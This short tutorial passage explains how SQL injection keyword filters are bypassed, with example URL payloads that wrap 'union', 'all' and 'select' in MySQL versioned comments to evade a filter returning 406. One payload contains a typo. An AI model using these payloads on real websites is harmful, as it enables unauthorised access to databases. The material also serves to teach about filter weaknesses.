Sql Injection : Filter Bypassing

Filter Bypassing

        Generally while doing sql injection, some sql keywords are used like union, select, from etc...the administrator filters these keywords so as to block such requests but it still becomes possible for an attacker to bypass these kind of filters

Example:
the attacker attacks like this,
    index.php?id=1  union all select 1,2,3--n site gives response 406 not acceptable so by using tricks like this
    index.php?id=1  /*!union*/ /*!all*/ *!select*/ 1,2,3-- the attacker bypasses the security there are many ways to bypass this , it depends on how strongly the administrator has created the filter.